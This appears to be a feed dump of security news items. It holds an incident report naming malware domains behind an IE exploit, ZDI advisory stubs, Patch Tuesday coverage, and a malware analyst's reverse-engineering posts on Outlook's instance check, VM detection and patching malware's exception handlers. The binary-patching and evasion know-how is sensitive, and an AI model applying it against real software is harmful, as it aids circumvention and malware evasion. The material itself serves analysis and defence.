==> Possible Root Compromise of Greatandhra.com

http://blog.scansafe.com/journal/rss.xml A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339. The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018). Successful exploit leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website. Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained. First encounters resulting from these attack began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

==> Secure Awareness mottoes and one-liners

http://blogs.securiteam.com/index.php/feed/ From various forums, mailing lists, discussions and other sources (many of which exist only in my febrile imagination), herewith a bit of a compilation of mottoes that can be used as part of a security awareness campaign: No-one in Africa wants to GIVE anyone their money or gold. Microsoft/Google/a Russian oil magnate/VW/BMW/etc certainly does not [...]

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)...are installed on the system where you are performing a penetration test, isn't it? I have decided to put for sell, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Microsoft joins Apple, Facebook, and Twitter; comes out as hack victim

http://feeds.arstechnica.com/arstechnica/security?format=xml Machines in the Mac Business Unit were compromised.

==> ZDI-CAN-1788: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1786: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1778: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Stephen Fewer of Harmony Security (www.harmonysecurity.com)' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1754: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1771: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1770: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1769: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Toan Pham Van' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1753: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1783: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1720: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 18 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1709: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2013-02-04, 18 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1694: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-02-04, 18 days ago. The vendor is given until 2013-08-03 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1755: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1695: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'SkyLined' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1721: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Simon Zuckerbraun' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1677: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1673: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1675: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'c1d2d9acc746ae45eeb477b97fa74688' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1592: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'FuzzMyApp' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1691: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-20, 94 days ago. The vendor is given until 2013-05-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1604: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher' and ' Microsoft & Paul Bates' and ' Microsoft' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will

==> ZDI-CAN-1602: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher (Microsoft) & Paul Bates (Microsoft)' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1651: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-08, 106 days ago. The vendor is given until 2013-05-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1648: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-30, 115 days ago. The vendor is given until 2013-04-28 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1649: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 121 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> Attention shoppers: Patch IE now before you shop online

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Today is the eleventh Patch Tuesday of 2012, but the first since the official launch of Windows 8 and Windows RT. There are six new security bulletinsa couple of which are particularly urgent, especially for anyone planning to do any online shopping this holiday season. There are four security bulletins rated as Critical, one Important, and one Moderate. The Critical security bulletins address issues with Internet Explorer, Windows kernel-mode drivers, the .NET framework, and flaws in Windows shell code that can allow remote exploits. The most crucial of the six security bulletins is the cumulative update for Internet ExplorerMS12-071. Andrew Storms, director of security operations for nCircle, declares, Topping our patch immediately list this month is the drive-by exploit affecting Internet Explorer 9. Its fairly obvious that Microsoft patched this bug in IE10 before its release; otherwise, we would have a bulletin affecting both IE9 and IE10. To read this article in full or to leave a comment, please click here

==> Patch Tuesday: Five critical bulletins, Exchange Server fix expected

http://feeds.pheedo.com/tt/1323 In addition to Exchange Server, updates fix flaws in Internet Explorer, Microsoft Office and Microsoft Word. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Flame Windows Update Attack Could Have Been Repeated in 3 Days, Says Microsoft

http://feeds.wired.com/wired27b Flame Windows Update Attack Could Have Been Repeated in 3 Days, Says MicrosoftWhen the sophisticated state-sponsored espionage tool known as Flame was exposed last year, no one was more concerned about the discovery than Microsoft, after realizing that the tool was signed with a modified

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off Google made the news with this article in the Financial Timesstating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches [...]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash-dump, I was amazed to see that the issue was in MFC42.DLL: MOV EBX,104 PUSH EBX LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH EAX PUSH DWORD PTR DS:[ESI+6C] CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> LEA EAX,DWORD PTR SS:[EBP+szBuffer] PUSH 2E PUSH EAX CALL DWORD PTR DS:[<&msvcrt._mbsrchr>] POP ECX POP ECX MOV DWORD PTR SS:[EBP-80],EAX MOV BYTE PTR DS:[EAX],0 <-- Crash! The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following: GetModuleFileName(NULL, szBuffer, MAX_PATH); *(_mbsrchr(szBuffer, '.')) = 0; The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing) then the highlighted line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of, however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! AAs surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists! Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold: PUSH 104 LEA EDX,DWORD PTR SS:[EBP+szBuffer] MOV [EDI+0C],ECX MOV EAX,DWORD PTR DS:[ESI+6C] PUSH EDX PUSH EAX CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA> TEST EAX,EAX JZ LOC_722F1484 CMP EAX,104 JZ LOC_722F1484 LEA ECX,[EBP+szBuffer] PUSH 2E PUSH ECX CALL __mbsrchr MOV EBX,EAX ADD ESP,8 TEST EBX,EBX MOV [EBP+VAR_310],EBX JZ LOC_7230DB7D ...
__mbsrchr: MOV EDI,EDI PUSH EBP MOV EBP,ESP POP EBP JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]
LOC_7230DB7D: ... JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>] While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista: C:\>copy c:\windows\notepad.exe notepad_exe 1 file(s) copied. C:\>notepad_exe 'notepad_exe' is not recognized as an internal or external command, operable program or batch file. C:\>start notepad_exe [This opens the "Open With" dialog box in Explorer instead of executing the file.] However, it is still possible to run non-dotted-files via API functions like CreateProcess(...) to cause the crash described above.

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits, however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitoring each process for termination, then deleting the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself. I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows: A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent: * TB_BUTTONCOUNT * TB_GETBUTTONINFOW * TB_SETBUTTONINFOW * WM_PAINT * WM_ERASEBKGND The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages: <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024 <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0 <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18 <00007> 00010056 R TB_HITTEST iIndex:0 <00008> 00010056 S TB_DELETEBUTTON iButton:0 <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to the TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE. With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area: #define FW(x,y) FindWindowEx(x, NULL, y, L"") void RefreshTaskbarNotificationArea() { HWND hNotificationArea; RECT r; GetClientRect( hNotificationArea = FindWindowEx( FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"), NULL, L"ToolbarWindow32", L"Notification Area"), &r); for (LONG x = 0; x < r.right; x += 5) for (LONG y = 0; y < r.bottom; y += 5) SendMessage( hNotificationArea, WM_MOUSEMOVE, 0, (y << 16) + x); }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make-do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call-stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via ret's, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running. The great thing about this approach is that it's incredibly straight-forward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call-in-question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code: .text:30006BB7 push offset WindowName ; "Microsoft Outlook" .text:30006BBC push offset aMspim_wnd32 ; "mspim_wnd32" .text:30006BC1 mov [ebp+var_42C], edi .text:30006BC7 call ds:FindWindowA This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straight-forward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions. As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional-jump after SIDT led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same base address of the IDT for my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction. However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase, forty-thousand hex. To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say, forty-thousand hex, they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsofts C++ compiler. So why say forty-thousand hex instead of four-hundred-thousand hex? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2-digits (bytes) instead of in groups of 3-digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right-to-left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function: mov edx, [ebp+arg_0] add edx, 108h push edx I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launced other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the bleep instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the bleep processes in a suspended state, attached a debugger to the bleep, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx). I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program that this would crash the bleep process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed bleep process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following: mov eax, fs:[0] mov [eax+4], 7c8399f3h int 3 This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the bleep process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 2.1.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.1.0 B1038 and release notes are available for download from the Support site : https://support.fortinet.com This concerns the following models: * MS Windows 7, MS Windows Vista, MS Windows XP, * Mac OS X 10.6

==> MS13-005 (win32k.sys) exploit POC

